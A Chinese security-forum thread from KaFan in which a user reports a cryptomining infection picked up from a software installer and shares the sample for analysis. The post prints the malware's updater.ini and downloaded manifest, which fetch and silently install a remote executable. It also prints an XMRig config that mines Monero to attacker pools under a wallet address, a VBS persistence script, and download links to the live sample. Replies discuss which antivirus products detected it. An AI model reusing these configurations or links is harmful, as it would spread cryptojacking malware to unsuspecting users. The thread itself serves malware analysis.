收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 第一次中病毒,挖矿脚本样本Main Services
123下一页
返回列表 发新帖
查看: 7874|回复: 26
收起左侧

[病毒样本] 第一次中病毒,挖矿脚本样本Main Services

[复制链接]
落尘之木
发表于 2017-12-30 17:23:23 | 显示全部楼层 |阅读模式
本帖最后由 落尘之木 于 2018-1-3 10:02 编辑

源于下载一个软件安装包运行,看情势不妙赶紧关掉,然后莫名奇妙的中病毒了,还弹广告,屏幕都变黄色了,从任务管理器找到了一个挖矿脚本,我的电脑已经删除了,不知道有没有后遗症。病毒创建了一个任务,不知道怎么移除,哪位大神分析下在哪里?


这货还有正规的数字签名


这是病毒样本的原文件
直链:https://attachments-cdn.shimo.im ... 9/MainServices2.zip
网盘链接:https://pan.baidu.com/s/1bpHbyMj 密码:18sm
运行后释放挖矿脚本到C:\Program Files\System Native\Main Services,有5个文件
updater.ini
updater.exe
service_box.exe
config.json
check_service.vbs

updater.ini内容:
  1. [General]
  2. AppDir=C:\Program Files\System Native\Main Services\
  3. ID={CE766360-28C8-4FCF-A5EE-F716A678A26E}
  4. ApplicationName=Main Services
  5. CompanyName=System Native
  6. ApplicationVersion=1.1.14
  7. DefaultCommandLine=/silentall
  8. CheckFrequency=1
  9. DownloadsFolder=C:\ProgramData\System Native\Main Services\updates\
  10. Flags=NoDisableAutoCheck|PerMachine|NoUpdaterInstallGUI
  11. SupportServiceName=updater
  12. URL=http://www.temp.uno/ms.txt
复制代码
顺着URL下载的ms.txt内容,里面是病毒文件下载
  1. ;aiu;

  3. [Update #5]
  4. NoGUICommandLineSwitch = /quiet PID=0 SUBID=0
  5. Name = Main Services
  6. ProductVersion = 1.1.14.0
  7. URL = https://1406588359.rsc.cdn77.org/files/MainServices2.exe
  8. Size = 3107168
  9. MD5 = 0759d7d716397ea852b7726150432b95
  10. ServerFileName = MainServices2.exe
  11. Flags = Critical|SilentInstall|Advertises
  12. RegistryKey = HKUD\Software\System Native\Main Services\Version
  13. Version = 1.1.14.0
复制代码


config.json内容:
  1. {
  2.     "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
  3.     "av": 0,                // algorithm variation, 0 auto select
  4.     "background": true,    // true to run the miner in the background
  5.     "colors": true,         // false to disable colored output   
  6.     "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
  7.     "cpu-priority": null,   // set process priority (0 idle, 2 normal to 5 highest)
  8.     "donate-level": 0,      // donate level, mininum 1%
  9.     "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
  10.     "max-cpu-usage": 65,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.  
  11.     "print-time": 60,       // print hashrate report every N seconds
  12.     "retries": 1,           // number of times to retry before switch to backup server
  13.     "retry-pause": 5,       // time to pause between retries
  14.     "safe": false,          // true to safe adjust threads and av settings for current CPU
  15.     "threads": null,        // number of miner threads
  16.     "pools": [
  17.                 {
  18.             "url": "xmr1.temp.uno:3334",
  19.             "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
  20.             "pass": "x",
  21.             "keepalive": true,
  22.             "nicehash": true
  23.     },
  24.     {
  25.             "url": "xmr2.temp.uno:3334",
  26.             "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
  27.             "pass": "x",
  28.             "keepalive": true,
  29.             "nicehash": true
  30.     },
  31.     {
  32.             "url": "xmr3.temp.uno:3334",
  33.             "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
  34.             "pass": "x",
  35.             "keepalive": true,
  36.             "nicehash": true
  37.     },
  38.     {
  39.             "url": "xmr4.temp.uno:3334",
  40.             "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
  41.             "pass": "x",
  42.             "keepalive": true,
  43.             "nicehash": true
  44.     },
  45.     {
  46.             "url": "xmr.temp.uno:3334",
  47.             "user": "47qNUZcigRGSj3byaeZV2m6t6VYBLqWNXhmTuo5zsykfZca5irRFXqXUF11nbjsuGHFeERH7ch5SucZX74F2WcCoGxKj6YW",
  48.             "pass": "x",
  49.             "keepalive": true,
  50.             "nicehash": true
  51.     }
  52.     ],
  53.     "api": {
  54.         "port": 8117,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
  55.         "access-token": null,                  // access token for API
  56.         "worker-id": null                      // custom worker-id for API
  57.     }
  58. }
复制代码
check_service.vbs内容
  1. Set ServiceSet = GetObject("winmgmts:").ExecQuery("select * from Win32_Service where Name='service_box.exe'")

  3. for each Service in ServiceSet
  4.         RetVal = Service.StartService()
  5. next
复制代码









本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

llcy
发表于 2017-12-30 17:41:23 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

JAYSIR
发表于 2017-12-30 17:45:27 | 显示全部楼层
本帖最后由 JAYSIR 于 2017-12-30 17:48 编辑

楼主是什么环境呢?装了什么杀软?


病毒样本:
卡巴斯基 解压后删除



病毒运行文件:
刚下载就阻止了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

ELOHIM
发表于 2017-12-30 18:03:53 | 显示全部楼层
wiep scan miss
回复

举报

maomao110
发表于 2017-12-30 18:21:53 | 显示全部楼层
ELOHIM 发表于 2017-12-30 18:03
wiep scan miss

我的心 好难受  我的脸 有点疼
回复

举报

ELOHIM
发表于 2017-12-30 18:39:26 | 显示全部楼层
maomao110 发表于 2017-12-30 18:21
我的心 好难受  我的脸 有点疼


你在说我我自己打自己脸了吗?
回复

举报

落尘之木
 楼主| 发表于 2017-12-30 18:40:56 | 显示全部楼层
JAYSIR 发表于 2017-12-30 17:45
楼主是什么环境呢?装了什么杀软?

Windows 10 Defender 报毒,但是没卵用,病毒还是我手动找出来的,删除%temp%缓存,幸亏手快,不然还可能会多出一堆广告软件。
回复

举报

JAYSIR
发表于 2017-12-30 18:43:07 | 显示全部楼层
本帖最后由 JAYSIR 于 2017-12-30 18:47 编辑
落尘之木 发表于 2017-12-30 18:40
Windows 10 Defender 报毒,但是没卵用,病毒还是我手动找出来的,删除%temp%缓存,幸亏手快,不然还可能 ...

还是换个其他杀软吧,折腾什么的,wd最近评分的确挺高,相对专业的杀软还是有很多不足,比如之前有人提到漏洞。。。。

卡巴说是合法的危险软件,可能指那个软件作为挖矿软件组件是正常的,但是也有可能被利用来挖矿病毒,所以他隔离了而不是删除。wd这里可能认为毕竟是正常软件,不会多想就放行了。
个人猜测,仅供参考



回复

举报

maomao110
发表于 2017-12-30 18:48:50 | 显示全部楼层
ELOHIM 发表于 2017-12-30 18:39
你在说我我自己打自己脸了吗?

我在说我   2楼  https://bbs.kafan.cn/thread-2112394-1-1.html  
回复

举报

安全守护者
头像被屏蔽
发表于 2017-12-30 19:27:40 | 显示全部楼层
  1. <html>
  2. <head><title>403 Forbidden</title></head>
  3. <body bgcolor="white">
  4. <center><h1>403 Forbidden</h1></center>
  5. <hr><center>marco/1.12</center>
  6. </body>
  7. </html>
  8. <!-- a padding to disable MSIE and Chrome friendly error page -->
  9. <!-- a padding to disable MSIE and Chrome friendly error page -->
  10. <!-- a padding to disable MSIE and Chrome friendly error page -->
  11. <!-- a padding to disable MSIE and Chrome friendly error page -->
  12. <!-- a padding to disable MSIE and Chrome friendly error page -->
  13. <!-- a padding to disable MSIE and Chrome friendly error page -->
复制代码


回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-20 02:23 , Processed in 0.151550 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表